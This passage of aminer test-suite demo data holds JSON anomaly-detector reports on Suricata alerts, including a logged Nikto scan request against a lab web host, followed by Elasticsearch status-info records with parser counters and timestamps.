terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46972 -> 192.168.10.154:80", "/parser/model/time": 1583349514.385406, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46972, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.385406 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46972 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.39 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.nsf", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.386008+0000\",\"flow_id\":1931339402763667,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46972,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.386008, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1931339402763667,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46972,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46972,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.nsf\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.nsf\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.nsf", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.nsf", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46972,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46972, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1931339402763667,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1931339402763667, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.386008+0000\",\"flow_id\":1931339402763667,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46972,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.39 ], "LogLinesCount": 1 } } logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerJsonInputDemo/json_logs/elastic.log000066400000000000000000002130261500476301700320070ustar00rootroot00000000000000{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"mDPoLXYBIkOurnXX5Icg","_score":1.0,"_source":{"FromTime":1.607087995611796E9,"StatusInfo":{"/parser/model/php":0,"/parser/model/event_type_str":100,"/parser/model/type_str":14916,"/parser/model/classification":0,"/parser/model/status_code":21,"/parser/model/host":10,"/parser/model/sp":0},"timestamp":"2020-12-04T13:20:06.072Z","ToTime":1.607088005611873E9,"fromtimestamp":"2020-12-04T13:19:55.611Z","totimestamp":"2020-12-04T13:20:05.611Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"nTPpLXYBIkOurnXXC4e7","_score":1.0,"_source":{"FromTime":1.60708800617559E9,"StatusInfo":{"/parser/model/php":0,"/parser/model/event_type_str":36,"/parser/model/type_str":17371,"/parser/model/classification":0,"/parser/model/status_code":2,"/parser/model/host":4,"/parser/model/sp":0},"timestamp":"2020-12-04T13:20:16.212Z","ToTime":1.607088016175659E9,"fromtimestamp":"2020-12-04T13:20:06.175Z","totimestamp":"2020-12-04T13:20:16.175Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"ojPpLXYBIkOurnXXNodQ","_score":1.0,"_source":{"FromTime":1.607088017076398E9,"StatusInfo":{"/parser/model/php":0,"/parser/model/event_type_str":167,"/parser/model/type_str":10246,"/parser/model/classification":0,"/parser/model/status_code":80,"/parser/model/host":14,"/parser/model/sp":0},"timestamp":"2020-12-04T13:20:27.113Z","ToTime":1.607088027076495E9,"fromtimestamp":"2020-12-04T13:20:17.076Z","totimestamp":"2020-12-04T13:20:27.076Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"qDPpLXYBIkOurnXXXoc-","_score":1.0,"_source":{"FromTime":1.607088027294802E9,"StatusInfo":{"/parser/model/php":0,"/parser/model/event_type_str":23,"/parser/model/type_str":1039,"/parser/model/classification":0,"/parser/model/status_code":13,"/parser/model/host":0,"/parser/model/sp":1},"timestamp":"2020-12-04T13:20:37.335Z","ToTime":1.607088037294874E9,"fromtimestamp":"2020-12-04T13:20:27.294Z","totimestamp":"2020-12-04T13:20:37.294Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"rjPpLXYBIkOurnXXiIco","_score":1.0,"_source":{"FromTime":1.607088038027988E9,"StatusInfo":{"/parser/model/php":0,"/parser/model/event_type_str":77,"/parser/model/type_str":3861,"/parser/model/classification":0,"/parser/model/status_code":23,"/parser/model/host":10,"/parser/model/sp":0},"timestamp":"2020-12-04T13:20:48.065Z","ToTime":1.607088048028038E9,"fromtimestamp":"2020-12-04T13:20:38.027Z","totimestamp":"2020-12-04T13:20:48.028Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"tDPpLXYBIkOurnXXsYfd","_score":1.0,"_source":{"FromTime":1.6070880487057E9,"StatusInfo":{"/parser/model/php":0,"/parser/model/event_type_str":23,"/parser/model/type_str":3633,"/parser/model/classification":0,"/parser/model/status_code":2,"/parser/model/host":9,"/parser/model/sp":3},"timestamp":"2020-12-04T13:20:58.742Z","ToTime":1.607088058705801E9,"fromtimestamp":"2020-12-04T13:20:48.705Z","totimestamp":"2020-12-04T13:20:58.705Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"uDPpLXYBIkOurnXX3Idz","_score":1.0,"_source":{"FromTime":1.607088059606552E9,"StatusInfo":{"/parser/model/php":0,"/parser/model/event_type_str":84,"/parser/model/type_str":15434,"/parser/model/classification":0,"/parser/model/status_code":27,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:21:09.644Z","ToTime":1.607088069606614E9,"fromtimestamp":"2020-12-04T13:20:59.606Z","totimestamp":"2020-12-04T13:21:09.606Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"vTPqLXYBIkOurnXXA4f9","_score":1.0,"_source":{"FromTime":1.607088069728031E9,"StatusInfo":{"/parser/model/php":0,"/parser/model/event_type_str":10,"/parser/model/type_str":481,"/parser/model/classification":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:21:19.766Z","ToTime":1.607088079728122E9,"fromtimestamp":"2020-12-04T13:21:09.728Z","totimestamp":"2020-12-04T13:21:19.728Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"wjPqLXYBIkOurnXXLoeH","_score":1.0,"_source":{"FromTime":1.607088080617636E9,"StatusInfo":{"/parser/model/php":0,"/parser/model/event_type_str":72,"/parser/model/type_str":4831,"/parser/model/classification":0,"/parser/model/status_code":33,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:21:30.656Z","ToTime":1.607088090617719E9,"fromtimestamp":"2020-12-04T13:21:20.617Z","totimestamp":"2020-12-04T13:21:30.617Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"xzPqLXYBIkOurnXXVYfA","_score":1.0,"_source":{"FromTime":1.607088090628122E9,"StatusInfo":{"/parser/model/php":0,"/parser/model/event_type_str":198,"/parser/model/type_str":16702,"/parser/model/classification":0,"/parser/model/status_code":31,"/parser/model/host":6,"/parser/model/sp":0},"timestamp":"2020-12-04T13:21:40.697Z","ToTime":1.607088100628174E9,"fromtimestamp":"2020-12-04T13:21:30.628Z","totimestamp":"2020-12-04T13:21:40.628Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"3zPrLXYBIkOurnXXK4c3","_score":1.0,"_source":{"FromTime":1.607088145306266E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":426,"/parser/model/type_str":51066,"/parser/model/php":0,"/parser/model/status_code":139,"/parser/model/host":47,"/parser/model/sp":4},"timestamp":"2020-12-04T13:22:35.344Z","ToTime":1.607088155306352E9,"fromtimestamp":"2020-12-04T13:22:25.306Z","totimestamp":"2020-12-04T13:22:35.306Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"4zPrLXYBIkOurnXXUodo","_score":1.0,"_source":{"FromTime":1.607088155324363E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":169,"/parser/model/type_str":22707,"/parser/model/php":0,"/parser/model/status_code":62,"/parser/model/host":6,"/parser/model/sp":0},"timestamp":"2020-12-04T13:22:45.377Z","ToTime":1.607088165324514E9,"fromtimestamp":"2020-12-04T13:22:35.324Z","totimestamp":"2020-12-04T13:22:45.324Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"6jPrLXYBIkOurnXXe4cc","_score":1.0,"_source":{"FromTime":1.607088165758297E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":378,"/parser/model/type_str":35426,"/parser/model/php":0,"/parser/model/status_code":80,"/parser/model/host":15,"/parser/model/sp":0},"timestamp":"2020-12-04T13:22:55.797Z","ToTime":1.607088175758337E9,"fromtimestamp":"2020-12-04T13:22:45.758Z","totimestamp":"2020-12-04T13:22:55.758Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"7jPrLXYBIkOurnXXpIcU","_score":1.0,"_source":{"FromTime":1.607088176247121E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":35,"/parser/model/type_str":2684,"/parser/model/php":0,"/parser/model/status_code":11,"/parser/model/host":7,"/parser/model/sp":0},"timestamp":"2020-12-04T13:23:06.284Z","ToTime":1.607088186247198E9,"fromtimestamp":"2020-12-04T13:22:56.247Z","totimestamp":"2020-12-04T13:23:06.247Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"8zPrLXYBIkOurnXXzYe8","_score":1.0,"_source":{"FromTime":1.607088186891987E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":22,"/parser/model/type_str":3552,"/parser/model/php":0,"/parser/model/status_code":8,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:23:16.949Z","ToTime":1.607088196892045E9,"fromtimestamp":"2020-12-04T13:23:06.891Z","totimestamp":"2020-12-04T13:23:16.892Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"-DPrLXYBIkOurnXX9Yed","_score":1.0,"_source":{"FromTime":1.60708819712081E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":39,"/parser/model/type_str":1110,"/parser/model/php":0,"/parser/model/status_code":3,"/parser/model/host":4,"/parser/model/sp":0},"timestamp":"2020-12-04T13:23:27.157Z","ToTime":1.607088207120882E9,"fromtimestamp":"2020-12-04T13:23:17.120Z","totimestamp":"2020-12-04T13:23:27.120Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"_TPsLXYBIkOurnXXHocN","_score":1.0,"_source":{"FromTime":1.607088207472226E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":25,"/parser/model/type_str":1741,"/parser/model/php":0,"/parser/model/status_code":9,"/parser/model/host":11,"/parser/model/sp":0},"timestamp":"2020-12-04T13:23:37.510Z","ToTime":1.607088217472315E9,"fromtimestamp":"2020-12-04T13:23:27.472Z","totimestamp":"2020-12-04T13:23:37.472Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"ATPsLXYBIkOurnXXSIgE","_score":1.0,"_source":{"FromTime":1.607088218216699E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":24,"/parser/model/type_str":4167,"/parser/model/php":0,"/parser/model/status_code":5,"/parser/model/host":2,"/parser/model/sp":0},"timestamp":"2020-12-04T13:23:48.252Z","ToTime":1.607088228216758E9,"fromtimestamp":"2020-12-04T13:23:38.216Z","totimestamp":"2020-12-04T13:23:48.216Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"CDPsLXYBIkOurnXXb4go","_score":1.0,"_source":{"FromTime":1.607088228236653E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":0,"/parser/model/type_str":0,"/parser/model/php":0,"/parser/model/status_code":2,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:23:58.273Z","ToTime":1.607088238236712E9,"fromtimestamp":"2020-12-04T13:23:48.236Z","totimestamp":"2020-12-04T13:23:58.236Z","version":"1"}}]}} 